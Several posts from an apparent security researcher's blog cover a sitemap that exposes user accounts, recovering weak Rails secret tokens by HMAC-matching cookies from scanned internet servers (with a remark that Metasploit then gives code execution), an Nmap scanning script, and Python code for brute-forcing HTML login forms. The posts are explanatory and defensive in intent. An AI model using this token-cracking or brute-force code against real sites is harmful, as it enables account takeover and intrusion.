On Robots and Sitemaps

Robots.txt and Sitemap.xml files are extremely useful when managing web crawlers, but they can also be dangerous when they give away too much information. So what are these files and how are they used?

Many years ago, web site owners and web crawlers developed a method to allow web site owners to politely ask web crawlers not to crawl certain portions of a site. This is done by defining a robots.txt file (Robots Exclusion Standard). For the most part, this standard is adhered to by web crawlers.

A typical robots.txt file looks like this.

#Google Search Engine Robot
User-agent: Googlebot
Allow: /?_escaped_fragment_

Allow: /search?q=%23
Disallow: /search/realtime
Disallow: /search/users
Disallow: /search/*/grid

Disallow: /*?
Disallow: /*/followers
Disallow: /*/following

Disallow: /account/not_my_account

#Yahoo! Search Engine Robot
User-Agent: Slurp
Allow: /?_escaped_fragment_

Allow: /search?q=%23
Disallow: /search/realtime
Disallow: /search/users
Disallow: /search/*/grid

Disallow: /*?
Disallow: /*/followers
Disallow: /*/following

Disallow: /account/not_my_account

This is a portion of Twitter’s robots.txt file. Notice how Twitter tells the search engines which portions of the site may be crawled and which may not.

Tonight, while surfing the web I found this robots.txt file. I’ll let you guess which site it goes to.

Sitemap: http://data.healthcare.gov/sitemap-data.healthcare.gov.xml

Notice that there are no Disallow directives. Based on the accepted convention, the web site owner gives all web robots permission to crawl the entire site. Theoretically, you could write your own robot and legally crawl the entire site.
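To see how a well-behaved robot would read such a file, here is a minimal sketch using Python's standard urllib.robotparser module. The robot name "MyRobot", the helper name load_rules, and the example.com rule set are made up for illustration; note that this parser does simple prefix matching and does not understand the wildcard patterns in the Twitter file above.

```python
from urllib.robotparser import RobotFileParser


def load_rules(robots_txt):
    """Parse the text of a robots.txt file and return the parser."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


# A robots.txt file that only contains a Sitemap directive.
open_site = load_rules(
    "Sitemap: http://data.healthcare.gov/sitemap-data.healthcare.gov.xml\n"
)

# With no Disallow directives, every path is allowed for every robot.
print(open_site.can_fetch("MyRobot", "http://data.healthcare.gov/any/path"))

# site_maps() requires Python 3.8 or later.
print(open_site.site_maps())

# A hypothetical rule set with one disallowed prefix, for comparison.
restricted = load_rules("User-agent: *\nDisallow: /search/users\n")
print(restricted.can_fetch("MyRobot", "http://example.com/search/users"))
print(restricted.can_fetch("MyRobot", "http://example.com/about"))
```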

Along with the agreement to use robots.txt files, web site owners and web crawlers also decided to use a sitemap.xml file to explicitly define the structure of the web site and the URLs “on a website that are available for crawling” (Sitemaps). The Sitemap directive can be added to the robots.txt file to tell web crawlers where to find the sitemap file.

If we look at the sitemap for data.healthcare.gov we can see the URLs which, by convention, we are EXPECTED to crawl or visit as users.

<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

This sitemap file tells us about two additional sitemap files. The sitemap-users-data.healthcare.gov0.xml file looks interesting.

<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">

This sitemap file tells us the profile link for a number of user accounts. In fact, it provides links to approximately 3900 user accounts. Again, based on convention, robots are EXPECTED to visit each of these links and download the page at the link. You can see that Google did exactly this by running this query.
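Pulling the links out of a sitemap file takes very little code, which is part of why a list of profile URLs is so easy to harvest. The following is a rough sketch using only the standard library; the sample XML and its example.com URLs are invented for illustration and are not the contents of the real sitemap. The same function works for both sitemapindex and urlset documents because both list their URLs in loc elements.

```python
import xml.etree.ElementTree as ET

# Namespace used by the sitemaps.org schema.
NS = {"sm": "http://www.sitemaps.org/schemas/sitemap/0.9"}

# Hypothetical sample data, not the real data.healthcare.gov sitemap.
SAMPLE_URLSET = """<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url><loc>http://example.com/profile/alice</loc></url>
  <url><loc>http://example.com/profile/bob</loc></url>
</urlset>"""


def sitemap_locations(xml_text):
    """Return every <loc> URL found in a sitemap or sitemap index."""
    root = ET.fromstring(xml_text)
    return [loc.text.strip() for loc in root.iterfind(".//sm:loc", NS) if loc.text]


for url in sitemap_locations(SAMPLE_URLSET):
    print(url)
```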

So, let’s download a page. When you visit a page in a browser, the page is downloaded and rendered by the browser. When a robot or search engine downloads the page they read and parse the HTML code that makes up the page. To see this HTML code, you can right-click on the page in your browser and choose View Source, or something similar depending on your browser. The source code looks like this.


Note, the source code is full of links to other portions of the data.healthcare.gov site, which, by convention, we are allowed to crawl because the robots.txt file does not define any disallowed portions of the site. One such link, /api/users/ta6q-868x?method=contact, is found about 1/3 of the way down the page. Visiting this page produces an error message in JSON format, which means a web crawler like Google will likely ignore this page.

{
  "code" : "method_not_allowed",
  "error" : true,
  "message" : "GET not allowed"
}

On a more serious note, a typical attack against websites includes enumerating user accounts and then attempting to brute-force the associated password. Typically, an attacker has to work to find a method to enumerate user accounts but in this case the sitemap file provides a list of user accounts. Personally, I think it would be wise to remove the sitemap file at http://data.healthcare.gov/sitemap-users-data.healthcare.gov0.xml.

Finding Weak Rails Security Tokens

The other day I was reading about the dangers of having your Rails secret token in your version control system. The TL;DR version is secret tokens are used to calculate the HMAC of the session data in the cookie. If you know the secret token you can send arbitrary session data and execute arbitrary code.

So I decided I’d go digging through GitHub to see if anyone had uploaded secret tokens to the site. Sure enough, there were more than a few secret tokens. This isn’t all bad because Rails allows different configuration settings in the same application depending on whether the app is in production or development. Most of the Rails apps used a strong secret_token, read from an environment variable or generated by SecureRandom, for the production site but a weak secret_token for the development site.

I took a few minutes to record the secret tokens I found and decided to see if I could find any of them in use on Internet-facing sites. To test this I went to Shodan to find Rails servers and found approximately 70,000 servers. I downloaded the details for about 20,000 of those servers and looked at the cookies to identify the ones running Rails apps. Rails cookies are distinct because they consist of a base64 encoded string followed by -- and then an HMAC of the base64 string. This gives a cookie, which looks like this.


Of the roughly 20,000 Rails servers for which I had details, only about 10,000 had cookies that matched the pattern above.

The digest of the cookie is produced by calculating the HMAC of the base64 string using the SHA1 hashing algorithm and the secret token as the key. To find the secret token we simply calculate the HMAC using each of the potential secret tokens as the key and see if the calculated digest matches the digest in the cookie. Of the approximately 10,000 cookies, I was able to find 7 secret tokens. This is not very impressive at all but it gave me hope to try a larger test.
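The check described above can be sketched in a few lines of Python. This is a minimal illustration and not the rails_secret_token.py script itself; it assumes the cookie value is a URL-encoded base64 string, two hyphens, and a 40-character hex SHA1 digest, and the function names are made up for this example.

```python
import hashlib
import hmac
import re
from urllib.parse import unquote


def split_cookie(value):
    """Split a cookie value into (data, digest), or return None if the
    value does not look like data--digest with a hex SHA1 digest."""
    data, sep, digest = unquote(value).rpartition("--")
    digest = digest.lower()
    if not sep or not re.fullmatch(r"[0-9a-f]{40}", digest):
        return None
    return data, digest


def find_secret_token(cookie_value, candidates):
    """Return the first candidate token whose HMAC-SHA1 of the cookie
    data matches the digest in the cookie, or None if none match."""
    parts = split_cookie(cookie_value)
    if parts is None:
        return None
    data, digest = parts
    for token in candidates:
        calculated = hmac.new(token.encode(), data.encode(), hashlib.sha1).hexdigest()
        if hmac.compare_digest(calculated, digest):
            return token
    return None
```

Calling find_secret_token(cookie, tokens) with a list of tokens collected from public repositories returns the matching token if one of them was used to sign the cookie.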

I decided to check the Alexa top 1 million web sites to see how many used a cookie with a digest, and for how many I could find the secret token. I’ve tested about 40,000 sites so far and have only found 303 sites that use a cookie that matches the pattern above. Of those 303 sites, I did not find any of the secret tokens. The results are not surprising and I realize this is a long shot that will probably come to nothing but sometimes you just have to test a theory. If I finish the testing I’ll update the blog post with the final stats.

Although I haven’t tried it yet, I believe that if you ran the same test on an internal network you would have more success because there are more likely to be development Rails servers on an internal network. If you’d like to try this on your network you can get the rails_find.py, rails_secret_token.py, and rails_secret_tokens.txt files here. The rails_find.py script takes a list of host names or IP addresses and writes any matching cookies to a file. The rails_secret_token.py script takes a file of cookies and the rails_secret_tokens.txt file and tests each token against each cookie.

If you do find a secret token during your testing, Metasploit will get you remote code execution.


Introduction to Python

I did a quick presentation tonight for the Chattanooga Python Users Group.

Hack Yourself First: An Introduction to Penetration Testing

I will be teaching an introductory penetration testing class on December 14, 2013. If you are a system administrator in the Chattanooga area, check it out. You can get the syllabus for the class here, http://asgconsulting.co/static/files/hyf_syllabus.pdf

Will Write Code For Friends

The other day my friend Slade asked me to write a script to take an address range and run an Nmap ping scan against it and then run a SYN scan against only the live hosts using a predefined set of ports. Finally, he wanted a simple output showing the hosts and only the open ports. So, I put together this short Python script. The usage is below:


discover.py IP_addresses [ports]

Addresses must be a valid Nmap IP address range and ports
must be a valid Nmap port list. Any ports provided will be
added to the default ports that are scanned: 21, 22, 23,
25, 53, 80, 110, 119, 143, 443, 135, 139, 445, 593, 1352,
1433, 1498, 1521, 3306, 5432, 389, 1494, 1723, 2049, 2598,
3389, 5631, 5800, 5900, and 6000. The script should be run
with root privileges.

The script uses the -oA switch to save the Nmap results for both the ping scan and the SYN scan. The gnmap file from the SYN scan is then parsed to produce a simple Markdown file that looks like this:

HP Officejet J4680 printer|HP PhotoSmart C390 or C4780; or
Officejet 6500, 7000, or 8500 printer|HP Photosmart C4500
or C7280, or Officejet J6450 printer

tcp/80 (open) - Virata-EmWeb 6.2.1 (HP Photosmart C4700
series printer http config)
tcp/ 139 (open) - tcpwrapped
tcp/ 445 (open) - netbios-ssn

Apple AirPort Extreme WAP or Time Capsule NAS device (NetBSD
4.99), or QNX 6.5.0

tcp/53 (open) - domain?
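The parsing step can be sketched roughly as follows. This is not the code from discover.py or gnmap2md.py; it is a minimal illustration that assumes the usual grepable layout, where each host line has a tab-separated "Ports:" section whose entries look like port/state/protocol/owner/service/rpc/version/. The function name and the sample line are made up.

```python
import re


def parse_gnmap(text):
    """Map each host address to a list of (protocol, port, service)
    tuples for its open ports, based on Nmap grepable output."""
    hosts = {}
    for line in text.splitlines():
        match = re.match(r"Host: (\S+)", line)
        if not match or "Ports: " not in line:
            continue  # comment lines and "Status:" lines have no port list
        ports_field = line.split("Ports: ", 1)[1].split("\t", 1)[0]
        open_ports = []
        # Entries are comma separated; only split where a new port number starts.
        for entry in re.split(r",\s*(?=\d+/)", ports_field):
            fields = entry.strip().split("/")
            if len(fields) >= 5 and fields[1] == "open":
                open_ports.append((fields[2], int(fields[0]), fields[4]))
        if open_ports:
            hosts[match.group(1)] = open_ports
    return hosts


# Hypothetical sample line in grepable format.
SAMPLE = (
    "Host: 192.168.1.10 (printer.local)\tStatus: Up\n"
    "Host: 192.168.1.10 (printer.local)\t"
    "Ports: 80/open/tcp//http//Virata-EmWeb 6.2.1/, "
    "139/open/tcp//tcpwrapped///, 631/closed/tcp//ipp///\t"
    "Ignored State: filtered (27)\n"
)

for host, ports in parse_gnmap(SAMPLE).items():
    print(host)
    for proto, port, service in ports:
        print("  {0}/{1} (open) - {2}".format(proto, port, service))
```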

In addition to the discover.py script, I created the gnmap2md.py script which converts gnmap formatted files into Markdown formatted files. You can get it here.
As always, I hope you enjoy the script and let me know if you have any trouble with it.

Chattanooga Technology Meetup

This weekend we had a technology meetup at the 4thfloor in the downtown branch of the Chattanooga Library. We had a good turnout and I was able to talk about two of my favorite subjects, Python and infosec.

Here’s the presentation I gave on the Requests library for Python.

Multiprocessor HTML Login Form Brute Force

The other day I needed to brute force an HTTP basic auth login so I fired up Metasploit, as I usually do, and tried to run the auxiliary/scanner/http/http_login module. The module crashed and printed out a stack trace. Instead of spending time troubleshooting it, I decided to throw together a quick Python script. So I used my multiprocessor SSH brute force script as a template and put together a multiprocessor basic auth script. Well, the next day I needed to brute force an HTML login form so I decided to write a Python script to do that as well.

HTTP Basic Auth is quite easy to brute force because after the credentials are sent, the server responds with a 401 status code if they were the wrong credentials and either a 2xx or 3xx status code if they were correct. HTML login forms are much more difficult because there are often cookies that must be set and hidden fields that are included in the form, typically for CSRF protection. In addition, the body of the server response must be parsed to determine if the login failed or succeeded. So, brute forcing an HTML login form follows a pattern like this.

  1. GET the login page so that any needed cookies are set.
  2. Parse the login form for any hidden fields and associated values that must be sent in addition to the credentials.
  3. POST the login form with the credentials and any hidden fields.
  4. Parse the response to see if a login failure has occurred and to update the value of any hidden fields.

I built a script that can automate the process, but it does require some manual intervention in the form of a configuration file. The configuration file can be seen below and is in JSON format. First, set the login URL and the action URL, which is where the form gets POSTed. Next, set the field name for the username and password and set the files that contain the list of usernames and passwords to try. Next, set the string of text that will be in the failure message and set the number of threads that should be used. Finally, define the names of any hidden fields that should be included in the login form.

{
	"login": "https://domain/login/url",
	"action": "https://domain/login/action",
	"ufield": "login",
	"pfield": "password",
	"ufile": "user",
	"pfile": "pass",
	"fail_str": "Some string that shows our login failed",
	"threads": "1",
	"hidden": [
		"hidden_field_name1", "hidden_field_name2"
	]
}

The script will first GET the login page defined in the config file, set any necessary cookies, and parse the page for the values of the hidden fields defined in the config file. Next, the script POSTs the login credentials and the hidden fields with their values to the action page defined in the config file. Finally, the response is parsed to find the failure string and to update the value of any hidden fields. If the failure string is present in the response, the process is repeated with a new set of credentials. If not, the script will stop and print the credentials that succeeded.
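The flow just described can be sketched as below. This is a simplified, single-threaded illustration and not the script from the repository: the class and function names are made up, and the session argument is assumed to be any object with get and post methods that return a response with a text attribute, such as a requests.Session. Only test logins you are authorized to test.

```python
from html.parser import HTMLParser


class HiddenFieldParser(HTMLParser):
    """Collect the values of the named <input> fields in a page."""

    def __init__(self, names):
        super().__init__()
        self.names = set(names)
        self.values = {}

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") in self.names:
            self.values[attrs["name"]] = attrs.get("value") or ""


def hidden_values(html, names):
    """Return a dict of the hidden field values found in the HTML."""
    parser = HiddenFieldParser(names)
    parser.feed(html)
    return parser.values


def try_login(session, cfg, hidden, user, password):
    """POST one set of credentials. Returns (succeeded, refreshed_hidden)."""
    form = dict(hidden)
    form[cfg["ufield"]] = user
    form[cfg["pfield"]] = password
    body = session.post(cfg["action"], data=form).text
    return cfg["fail_str"] not in body, hidden_values(body, cfg["hidden"])


def brute_force(session, cfg, users, passwords):
    """Try every user/password pair; return the first pair that works."""
    # GET the login page so cookies are set, then read the hidden fields.
    page = session.get(cfg["login"]).text
    hidden = hidden_values(page, cfg["hidden"])
    for user in users:
        for password in passwords:
            succeeded, refreshed = try_login(session, cfg, hidden, user, password)
            if succeeded:
                return user, password
            # Keep any hidden field values the failure page handed back.
            hidden.update(refreshed)
    return None
```

The cfg dictionary uses the same keys as the JSON configuration file, so it could be loaded with json.load; the ufile and pfile word lists would be read into the users and passwords arguments.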

The script and a sample configuration file can be downloaded from the Scripts repository on my GitHub account, https://github.com/averagesecurityguy/scripts. As always, let me know if you have any questions or trouble running the script.

Facebook WTF?

I do not use Facebook and after a few years, I finally convinced my wife to give it up. In my opinion, the social benefits of Facebook are far outweighed by the privacy and security concerns. To demonstrate, my father-in-law recently received a phishing message through facebookmail, see the screenshot below.


The email has all the typical signs of a phishing email including the bad grammar and the FUD meant to get you to click on the link. The only problem is the link is a legitimate Facebook URL. Confused, I fired up a VM and visited the link, which took me to this page.


The page appears to be a security warning with a URL at the bottom. I think most Facebook users would see this as normal and click Continue. In fact, the page is designed to let you know you are leaving Facebook to go to the displayed URL but the only indication that you are leaving Facebook is the title of the page.


I thought to myself, “That can’t be right, maybe a logged in user gets a different message”. So, I created an account and visited the link again. This time I got a warning message letting me know the link was potentially spammy.


Excellent, Facebook is watching out for its users and protecting them from spammy links. Not so fast. If you look at the phishing URL closely, you can see it has three parts: http://www.facebook.com/l/, a random string, and the redirect URL. I decided to make some changes to the phishing URL and see what would happen.

If you modify the random string the warning message is no longer displayed because Facebook doesn’t recognize this new URL as malicious. This means that Facebook is detecting the malicious link based on the full URL and not on the redirect URL. Based on this, it seems that scammers could set up one site and create many different URLs that redirect to this one site, and they would likely never be caught by Facebook.

To prevent problems with these types of links, Facebook should make it very clear that the user is leaving Facebook to go to a new site; a message in the page title is not enough. In addition, Facebook should determine if a link is “spammy” based on the destination URL, not the original URL.

I reported this as a potential bug but Facebook didn’t seem to see it as a bug. Maybe I’m crazy, what do you think?

Why Evolution is True

I know this is off topic for this blog but it’s my blog so here goes. I was raised as a Christian, and still hold to the Christian faith. As a part of my upbringing I was always taught that evolution was not true. Not wanting to blindly believe this, I decided to learn more about it and see if the arguments for evolution stand to reason. With this end in mind I bought the book “Why Evolution is True” by Jerry A. Coyne and started reading it tonight. I have read the Preface, Introduction, and first chapter. Evolution, like many other scientific theories, has been studied for over a hundred years by people much smarter than I, so I don’t expect to read this book and be able to prove or disprove the arguments. My primary goal, for now, is to ask questions and, once those questions have been satisfactorily answered, draw my conclusions. With that in mind, these are some of my observations and questions from what I’ve read so far.

Chapter 1:
On pages 9 and 10, Dr. Coyne says,

“Matchbooks resemble the kinds of creatures expected under a creationist explanation of life. In such a case, organisms would not have common ancestry, but would simply result from an instantaneous creation of forms designed de novo to fit their environments. Under this scenario, we wouldn’t expect to see species falling into a nested hierarchy of forms that is recognized by all biologists.”

My question here is, why does creation imply disorder? Is it not feasible for an entity that is powerful enough to create everything we know to also do it in an orderly manner? If creation was done in an orderly manner, why would we not expect to see a nested hierarchy of forms and similarities in DNA structure?

On page 11, Dr. Coyne says,

“Over time, the population will gradually become more and more suited to its environment as helpful mutations arise and spread through the population, while deleterious ones are weeded out.”

This would seem to imply that over the course of tens of thousands of years there were no drastic changes to the environment; otherwise natural selection would not be able to keep up. Do other areas of science show these long periods of time with no drastic changes to the earth’s environment?

On page 18, Dr. Coyne says,

“Imperfection is the mark of evolution, not of conscious design. We should then be able to find cases of imperfect adaptation, in which evolution has not been able to achieve the same degree of optimality as would a creator.”

This statement doesn’t seem to be provable and it also assumes that optimality is the ultimate goal of a creator. There is no reason that what we see as imperfection could not be purposely designed.

The next chapters get into the science behind evolution and I look forward to reading them. I hope to do additional blog posts as I move through the book.

PTArticlegen.com: Behind the Scenes

The other day I put up a site called ptarticlegen.com that creates a random penetration testing article using Markov chains. If you’ve never heard of a Markov chain, check out the Wikipedia article. Put simply, a Markov chain is generated by making a random choice based on the current state of a system and using that choice to determine the next state of the system. The current state of the system only depends on the previous state and not all the choices leading up to the previous state.

Markov chains can be used to generate sentences by taking a word pair and choosing the next word from a list of words that typically follow that word pair. But first, a set of source data has to be analyzed to find word pairs and create a list of words that typically follow those word pairs.

As an example consider these two sentences:
The fox jumped over the spoon.
The cow jumped over the moon.

The word pairs and the list of following words would look like this:

(The, fox) - [jumped]
(fox, jumped) - [over]
(jumped, over) - [the, the]
(over, the) - [spoon, moon]
(The, cow) - [jumped]
(cow, jumped) - [over]

If we use (The, fox) as our starting word pair we can generate the sentence, “The fox jumped over the moon” by making the following choices:

(The, fox) -> jumped
(fox, jumped) -> over
(jumped, over) -> the
(over, the) -> moon
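The example above can be reproduced with a short Python sketch. This is an illustration of the technique and not the code behind ptarticlegen.com; the function names are made up, and trailing periods are stripped so the word lists match the table above.

```python
import random
from collections import defaultdict


def build_chain(sentences):
    """Map each word pair to the list of words that follow it."""
    chain = defaultdict(list)
    for sentence in sentences:
        words = sentence.rstrip(".").split()
        for first, second, follower in zip(words, words[1:], words[2:]):
            chain[(first, second)].append(follower)
    return chain


def generate(chain, start, max_words=50):
    """Build a sentence from a starting word pair by repeatedly choosing
    a random follower for the last two words."""
    words = list(start)
    while len(words) < max_words:
        followers = chain.get(tuple(words[-2:]))
        if not followers:
            break  # no known follower, so the sentence ends here
        words.append(random.choice(followers))
    return " ".join(words)


chain = build_chain([
    "The fox jumped over the spoon.",
    "The cow jumped over the moon.",
])
print(generate(chain, ("The", "fox")))
```

Because (over, the) has two possible followers, repeated runs produce either “The fox jumped over the spoon” or “The fox jumped over the moon”.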

To create the articles I wrote a Python script to analyze 600 sentences taken from my blog and then generate new sentences based on the analysis. I also used Python and web.py to create the web site. The Markov chain code I wrote is a modification of code from these two excellent resources. You can get the source code for ptarticlegen.com from my GitHub account.